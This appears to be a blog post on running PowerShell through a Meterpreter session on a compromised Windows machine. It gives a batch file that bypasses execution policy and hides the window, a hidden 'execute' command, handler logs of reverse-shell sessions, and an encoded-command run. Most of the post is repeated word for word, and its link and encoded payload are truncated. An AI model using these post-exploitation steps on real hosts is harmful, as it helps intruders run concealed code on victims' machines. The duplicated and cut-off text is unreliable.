I don't know why but powershell and meterpeter just dont play nice.
Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.
In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either. If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)
so, you can run powershell scripts via bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].
C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1
Example:
meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
carlos perez mentioned at Derbycon you can also do:
on linux download this script https://github.com/
you can use it to encode a script and then run it like so:
![]()
Part of it is the whole interactive shell-ness of powershell. so if you just type "powershell" once you drop to a cmd.exe you wont ever get the powershell prompt.
In a similar vain i've been unable to get any sort of combination of execute -f powershell.exe -a " blah blah" to work either. If anyone has the magic syntax i know lots of people that would be interested. (actually carlos perez hooked me up...answer below)
so, you can run powershell scripts via bat files and those execute just fine from within cmd.exe or from the "execute" command OR the encoded command [command].
C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1
Example:
meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
carlos perez mentioned at Derbycon you can also do:
on linux download this script https://github.com/
you can use it to encode a script and then run it like so:
msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.225
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\carlos\Desktop>
powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAG
hello world
C:\Users\carlos\Desktop>
